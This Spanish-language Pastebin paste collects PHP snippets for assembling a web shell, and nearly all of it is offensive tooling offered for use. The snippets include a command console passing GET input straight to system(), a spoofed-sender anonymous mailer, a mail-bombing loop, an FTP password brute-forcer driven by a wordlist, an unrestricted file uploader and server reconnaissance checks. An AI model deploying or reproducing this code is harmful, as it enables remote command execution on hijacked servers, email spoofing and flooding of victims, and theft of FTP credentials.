Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Para datos de la shell:
- $_SERVER['SERVER_SOFTWARE'] = Apache/1.3.33 (Win32) PHP/4.3.10
- PHP_VERSION = 4.3.10
- PHP_OS = WINNT
- $_SERVER['HTTP_HOST'] = localhost
- $_SERVER['SCRIPT_FILENAME'] = c:/archivos de programa/easyphp1-8/www/shell/shells.php
- $_SERVER['DOCUMENT_ROOT'] = c:/archivos de programa/easyphp1-8/www
- $_SERVER['SERVER_ADMIN'] = admin@localhost
- $_SERVER['SERVER_PROTOCOL'] = HTTP/1.1
- $_SERVER['GATEWAY_INTERFACE'] = CGI/1.1
- $_SERVER['HTTP_ACCEPT_LANGUAGE'] = es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
- $_SERVER['SERVER_ADDR'] = 189.xxx.xx.xxx
- $_SERVER[REQUEST_METHOD] = GET
- Espacio disponible en disco duro:
- Código:
- <?
- $espacio_disponible = disk_free_space("/");
- echo "Espacio disponible: " . $espacio_disponible / 1000000000 ." GB";
- ?>
- Safe mode ON u OFF
- Código:
- <?
- if( ini_get('safe_mode') ){
- echo "Safe Mode: " . '<font color="#FF0000">' . "ON" . '</font>';
- }else{
- echo "Safe Mode: " . '<font color="#00FF00">' . "OFF" . '</font>';
- }
- ?>
- Consola CMD:
- Código:
- <h1>CMD:</h1>
- <FORM METHOD="GET" NAME="consol" ACTION="">
- <INPUT TYPE="text" NAME="console">
- <INPUT TYPE="submit" VALUE="Enviar">
- </FORM>
- <pre>
- <?
- if($_GET['console']) {
- system($_GET['console']);
- }
- ?>
- Mail anonimo:
- Código:
- <h1>Mail Anonimo</h1>
- <b>De-nombre:</b>
- <input type="text" name="from">
- <b>De-mail:</b>
- <input type="text" name="de">
- <b>Para:</b>
- <input type="text" name="para"> </td></tr><tr><td rowspan=2>
- <b>Mensaje:</b><br/>
- <textarea name="msg"></textarea> <br/>
- <input type="submit" name="click" value="Enviar"><br/>
- Nota: si no llega el mail, es por que la web no tiene el puerto 25 abierto "puerto para mandar los mails"
- <hr>
- <?php
- //f
- if (isset($_POST['click']))
- {
- $de=$_POST['de'];
- $msg=$_POST['msg'];
- $from=$_POST['from'];
- $para=$_POST['para'];
- $headers = "MIME-Version: 1.0\\r\\n";
- $headers .= "Content-type: text/html; charset=iso-8859-1\\r\\n";
- $headers .= "From: $from <$de>";
- if(mail($para, $asunto, $msg, $headers)) print('Mensaje enviado correctamente;');
- else 'Mensaje fallido, posiblemente function mail no activa';
- }
- ?>
- MailBomber:
- Código:
- <h1>MailBomber</h1>
- <b>De:</b> <br/>
- <input type="text" name="de"> <br/>
- <b>Para:</b><br/>
- <input type="text" name="para"> <br/>
- <b>Mensaje:</b><br/>
- <textarea name="msg"></textarea> <br/>
- <b>N. de mails:</b> <br/>
- <input type="text" name="mails"> <br/>
- <input type="submit" name="clicke" value="Enviar">
- </form>
- <?php
- if (isset($_POST['clicke']))
- {
- @$para=$_POST['para'];
- @$mails=$_POST['mails'];
- @$msg=$_POST['msg'];
- @$de=$_POST['de'];
- for($i = 0; $i <= $mails; $i++)
- {
- mail("$para", $de, $msg);
- }
- }
- print "Nota: si no llegan los mails, es por que la web no tiene el puerto 25 abierto //puerto para mandar los mails";
- ?>
- Mostrar directorio y archivos de WWW:
- Código:
- <?php
- //definimos el path de acceso
- $var1= $_SERVER['DOCUMENT_ROOT'];
- $path = $var1;
- echo ('<h2><font color="#0000ff">') . "Directorios & Archivos de: " . ('</font></h2>') . ('<font color="#808080">') . $var1 . ('</font>');
- echo "<br>";
- //abrimos el directorio
- $dir = opendir($path);
- //Mostramos las informaciones
- while ($elemento = readdir($dir))
- {
- echo '<a href="'. "/{$elemento}\\">{$elemento}</a><br>";
- }
- //Cerramos el directorio
- closedir($dir);
- ?>
- FTP BruteForce:
- Código:
- <html>
- <head>
- <title>FTP BruteForce</title>
- </head>
- <body>
- <form method="POST" action="#">
- Usuario: <input type="text" name="usr"><br/>
- Direccion: <input type="text" name="url"><br/>
- Puerto: <input type="text" name="port" value="21"><br/>
- <input type="submit" name="boton" value="Conectar">
- </form>
- </body>
- </html>
- <?php
- #By Furcronet.
- if ($_POST['boton']){
- $usr = $_POST['usr'];
- $url = $_POST['url'];
- $port = $_POST['port'];
- if ($conex = @ftp_connect($url,$port)){
- echo "Conexion Establecida ";
- }else{
- echo "No se puede establecer la conexion ";
- }
- if($file = @fopen("db.txt", 'r')){
- while(!feof($file)){
- $passwd = fgets($file);
- $passwd = trim($passwd);
- if (@ftp_login($conex,$usr,$passwd)){
- echo '<br/>' . "User y Password correctos!";
- echo '<br/>' . '<b>' . "Usuario: " . $usr . '<br/>' . " Password: " . $passwd . '</b>';
- }}}}
- ?>
- cURL, MySQL, MSSQL, PostgreSQL, Oracle ON u OFF:
- Código:
- <?php
- $curl_on = @function_exists('curl_version');
- echo '<b>' ."cURL:" . '</b>'.(($curl_on)?("<font color=#FF0000>ON</font>"):("<font color=#00FF00>OFF</font>"));
- echo "<br>";
- echo '<b>' . "MySQL:" . '</b>';
- $mysql_on = @function_exists('mysql_connect');
- if($mysql_on){
- echo "<font color=#FF0000>ON</font>"; } else { echo "<font color=#00FF00>OFF</font>"; }
- echo "<br>";
- echo '<b>' . "MSSQL:" . '</b>';
- $mssql_on = @function_exists('mssql_connect');
- if($mssql_on){echo "<font color=#FF0000>ON</font>";}else{echo "<font color=#00FF00>OFF</font>";}
- echo "<br>";
- echo '<b>' ."PostgreSQL:" . ('</b>');
- $pg_on = @function_exists('pg_connect');
- if($pg_on){echo "<font color=#FF0000>ON</font>";}else{echo "<font color=#00FF00>OFF</font>";}
- echo "<br>";
- echo '<b>' . "Oracle:" . '</b>';
- $ora_on = @function_exists('ocilogon');
- if($ora_on){echo "<font color=#FF0000>ON</font>";}else{echo "<font color=#00FF00>OFF</font>";}
- echo "<br>";
- ?>
- MKDIR; Hacer una nueva carpeta:
- Código:
- <h1>MKDIR</h1>
- <form method="POST" action="">
- <input type="text" name="nombre_dir">
- <input type="submit" name="botonsito">
- </form>
- <?
- if (isset($_POST['botonsito'])) {
- $nombre_dir = $_POST['nombre_dir'];
- mkdir($nombre_dir);
- }
- ?>
- Upload: // has una carpeta con el nombre files
- upload.php:
- Código:
- <form action="upload2.php" method="post" enctype="multipart/form-data">
- <input name="archivo" type="file" size="35" />
- <input name="enviar" type="submit" value="Upload File" />
- <input name="action" type="hidden" value="upload" />
- </form>
- upload2.php:
- Código:
- <?php
- $archivo = $_FILES["archivo"]['name'];
- $destino = "files/"."_".$archivo;
- if (copy($_FILES['archivo']['tmp_name'],$destino)) {
- echo "se copio la imagen correctamente";
- echo '<br/>';
- echo '<img src="' . $destino . '">';
- }else{
- echo "no se pudo copiar la imagen";
- }
- ?>
- Permisos de ejecucion:
- Código:
- <?php
- function permisos($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Enlace Simbólico
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Bloque especial
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directorio
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Caracter especial
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // Pipe FIFO
- $info = 'p';
- } else {
- // Desconocido
- $info = 'u';
- }
- // Dueño
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Grupo
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // Mundo
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement